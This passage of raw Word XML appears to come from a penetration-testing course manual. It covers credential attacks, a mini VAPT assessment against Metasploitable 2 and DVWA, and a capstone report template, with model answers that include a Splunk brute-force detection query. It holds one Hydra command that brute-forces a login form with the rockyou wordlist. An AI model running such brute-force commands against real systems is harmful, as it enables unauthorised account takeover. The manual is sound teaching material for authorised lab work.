          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Run Hydra against the DVWA HTTP login form (adjust the failure string to match your DVWA instance): </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7A1F1F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">hydra -l admin -P /usr/share/wordlists/rockyou.txt &lt;target-ip&gt; http-post-form "/dvwa/login.php:username=^USER^&amp;password=^PASS^:Login failed"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Record time taken for each tool/method in a short comparison table.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Observation Questions — Answered</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="dxa" w:w="9746"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="B8860B" w:sz="6"/>
          <w:left w:val="single" w:color="B8860B" w:sz="6"/>
          <w:bottom w:val="single" w:color="B8860B" w:sz="6"/>
          <w:right w:val="single" w:color="B8860B" w:sz="6"/>
          <w:insideH w:val="none" w:color="FFFFFF" w:sz="0"/>
          <w:insideV w:val="none" w:color="FFFFFF" w:sz="0"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9746"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9746"/>
            <w:shd w:fill="FFF6E5" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="150"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="150"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext/>
              <w:spacing w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="B8860B"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">✎ Example — Q1. Why does adding a salt to a password hash dramatically increase cracking time even with the same dictionary?</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="280"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Without a salt, identical passwords produce identical hashes, so one precomputed/dictionary pass can crack every account sharing that password at once. A salt (random data added before hashing) makes every hash unique even for identical passwords, forcing the attacker to run the entire dictionary separately against each individual hash rather than reusing results across the whole database — multiplying total work by the number of accounts.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="dxa" w:w="9746"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="B8860B" w:sz="6"/>
          <w:left w:val="single" w:color="B8860B" w:sz="6"/>
          <w:bottom w:val="single" w:color="B8860B" w:sz="6"/>
          <w:right w:val="single" w:color="B8860B" w:sz="6"/>
          <w:insideH w:val="none" w:color="FFFFFF" w:sz="0"/>
          <w:insideV w:val="none" w:color="FFFFFF" w:sz="0"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9746"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9746"/>
            <w:shd w:fill="FFF6E5" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="150"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="150"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext/>
              <w:spacing w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="B8860B"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">✎ Example — Q2. From a defender's perspective, what detection rule in Splunk would alert on an SSH brute force attack?</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="280"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">A search counting failed SSH authentication events grouped by source IP over a short rolling window, alerting when the count exceeds a threshold — for example, an SPL query such as </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="7A1F1F"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">index=linux sourcetype=auth "Failed password" | stats count by src_ip | where count &gt; 20</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> evaluated over a 5-minute window, saved as a scheduled alert.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
        <w:spacing w:after="160" w:before="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Practical 8 — Putting It Together: Mini VAPT Assessment (Est. 5 hrs)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Aim:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Conduct a mini end-to-end penetration test against Metasploitable 2 following the 5-phase methodology and document findings in a structured format ready for the capstone report.</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2144"/>
        <w:gridCol w:w="7602"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2144"/>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Item</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7602"/>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Details</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="214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Environment</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="760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Kali Linux to Metasploitable 2 + DVWA</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="214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Tools</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="760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All tools used in Practicals 1–7</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Repeat Reconnaissance (Practical 1) and Scanning (Practical 2) against the full lab environment.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Exploit at least one service (Practical 3) and escalate privileges (Practical 4).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Test at least one web vulnerability class from Practicals 5–6.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Attempt credential attacks from Practical 7 where applicable.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Document each finding on a finding sheet: Title, Severity (CVSS), Affected system, Description, Evidence (screenshot reference), Remediation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Label and organise all screenshots consistently (e.g. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7A1F1F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">F1-screenshot1.png</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">) ready for the capstone.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Observation Questions — Answered</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="dxa" w:w="9746"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="B8860B" w:sz="6"/>
          <w:left w:val="single" w:color="B8860B" w:sz="6"/>
          <w:bottom w:val="single" w:color="B8860B" w:sz="6"/>
          <w:right w:val="single" w:color="B8860B" w:sz="6"/>
          <w:insideH w:val="none" w:color="FFFFFF" w:sz="0"/>
          <w:insideV w:val="none" w:color="FFFFFF" w:sz="0"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9746"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9746"/>
            <w:shd w:fill="FFF6E5" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="150"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="150"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext/>
              <w:spacing w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="B8860B"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">✎ Example — Q1. You found 12 vulnerabilities. The client says they can fix only 3 this month. How do you decide which 3 to recommend?</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="280"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Rank by a combination of confirmed exploitability (manually verified, not just scanner-reported), exposure (internet-facing and reachable without authentication scores higher than internal-only), and business impact of the affected asset (a finding on a system holding customer data outweighs one on a low-value test system). The 3 recommended should be those with the highest realistic risk-reduction per fix — not simply the 3 with the numerically highest CVSS scores, since a lower-scored but trivially exploitable internet-facing issue may matter more than a higher-scored but hard-to-reach internal one.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="dxa" w:w="9746"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="B8860B" w:sz="6"/>
          <w:left w:val="single" w:color="B8860B" w:sz="6"/>
          <w:bottom w:val="single" w:color="B8860B" w:sz="6"/>
          <w:right w:val="single" w:color="B8860B" w:sz="6"/>
          <w:insideH w:val="none" w:color="FFFFFF" w:sz="0"/>
          <w:insideV w:val="none" w:color="FFFFFF" w:sz="0"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9746"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9746"/>
            <w:shd w:fill="FFF6E5" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="150"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="150"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext/>
              <w:spacing w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="B8860B"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">✎ Example — Q2. What is the difference between a grey-box and a black-box penetration test, and when would you choose each?</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="280"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">In a </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">black-box</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> test, the tester starts with no internal knowledge of the target — only what a real external attacker would have — which best simulates an outsider attack but takes longer to reach deep findings. In a </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">grey-box</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> test, the tester is given partial information (e.g. an application account, network diagrams, or source code access), which more closely simulates an insider or a attacker who has already gained a foothold, and allows deeper coverage within a limited time budget. Black-box suits testing external perimeter defences realistically; grey-box suits testing internal application logic and privilege boundaries efficiently when time is limited.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pageBreakBefore/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1F3864" w:sz="12" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="240" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">Capstone — Full VAPT Report (Weeks 11–13)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Objective:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Expand Practical 8 into a complete, professionally structured penetration test report for a simulated client engagement.</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2924"/>
        <w:gridCol w:w="6822"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2924"/>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Deliverable component</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6822"/>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Requirement</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="292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Cover page</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="682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Tester, date, target, scope, classification</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="292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Executive Summary</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="682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1 page, non-technical</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="292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Scope &amp; Methodology</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="682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What was tested, how, and when</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="292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Technical Findings</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="682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Minimum 6 findings, each with all required fields (see Unit V, Section 5.1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="292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Risk Heat Map</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="682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Likelihood vs impact plot of all findings</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="292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Remediation Priority Table</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="682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Findings ranked into an actionable fix order</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="292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Conclusion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="682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Overall risk posture and closing recommendation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Assessment (30 marks):</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Finding quality and evidence (15) · Report structure and writing (10) · CVSS accuracy (5).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
        <w:spacing w:after="160" w:before="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Reusable VAPT Report Template</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Adapt the skeleton below for your own authorised lab assessment. Replace every bracketed placeholder.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="dxa" w:w="9746"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="888888" w:sz="6"/>
          <w:left w:val="single" w:color="888888" w:sz="6"/>
          <w:bottom w:val="single" w:color="888888" w:sz="6"/>
          <w:right w:val="single" w:color="888888" w:sz="6"/>
          <w:insideH w:val="none" w:color="FFFFFF" w:sz="0"/>
          <w:insideV w:val="none" w:color="FFFFFF" w:sz="0"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9746"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9746"/>
            <w:shd w:fill="F5F5F0" w:val="clear"/>
            <w:tcMar>
